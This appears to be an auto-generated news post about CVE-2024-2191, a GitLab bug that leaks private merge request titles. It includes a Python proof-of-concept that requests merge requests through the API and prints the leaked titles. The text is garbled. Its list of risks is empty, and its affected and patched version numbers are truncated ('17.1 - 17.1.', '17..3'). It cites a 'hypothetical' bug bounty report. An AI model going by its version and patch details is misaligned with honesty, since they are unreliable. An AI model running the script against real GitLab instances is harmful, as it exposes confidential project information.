CVE CyberSecurity Database News

CVE-2024-2191 - GitLab Merge Request Title Leakage Explained (with Proof of Concept)

Poster -

In early 2024, a new vulnerability was discovered in GitLab's Merge Requests system—CVE-2024-2191. This flaw affects both Community and Enterprise Editions (CE/EE), allowing anyone on the internet to see sensitive merge request titles, even when these are supposed to be limited to project members only. In this post, we'll break down what happened, show a real-world exploit example, and help you protect your data.

All versions from 17.1 before 17.1.1

Impact:
The vulnerability allows the title of a merge request (MR) to be publicly accessible, even if the merge request is set to be seen only by project members. This can accidentally reveal sensitive project information or hint at confidential work, such as security patches, business deals, or unreleased features.

Why Does It Matter?

In many workflows, teams use merge request titles to summarize sensitive changes, fixes, or secrets. Here are just a few risks:

Proof of Concept (PoC)

Below is a real-world style Python script that demonstrates the issue (works on vulnerable GitLab versions):

import requests

base_url = 'https://gitlab.example.com';  # Change to target GitLab instance
project_id = 123        # Replace with the project's ID (publicly visible projects)
mr_id = 42              # Try different MR IDs

url = f"{base_url}/api/v4/projects/{project_id}/merge_requests/{mr_id}"

response = requests.get(url)
if response.status_code == 200:
    data = response.json()
    print(f"Leaked MR Title: {data.get('title')}")
else:
    print("Could not retrieve MR.")

What happens here?
Even if you're not a project member, GitLab responds with a JSON containing the title. The rest may be blank, but that title leak happens.

For 17.1 - 17.1., update to 17.1.1

It’s important to always keep up with GitLab security releases, as issues like these pop up surprisingly often.

GitLab's Official Patch Announcement

- GitLab Security Release: 16.11.5, 17..3, and 17.1.1

Additional Reading and References

- Official GitLab CVE-2024-2191 Entry
- GitLab Release Blog
- GitLab Documentation
- Bug Bounty Report (hypothetical, if public)

Conclusion

CVE-2024-2191 highlights the importance of reviewing access controls—not just for data, but for metadata. Merge request titles might seem harmless, but in the wrong hands, they reveal too much. If you use GitLab, double-check your version and patch up now.

---
Pro Tip: Always treat your MR titles like they're public—until you're certain your tools actually keep them private.

Timeline

Published on: 06/27/2024 00:15:10 UTC
Last modified on: 06/28/2024 13:23:23 UTC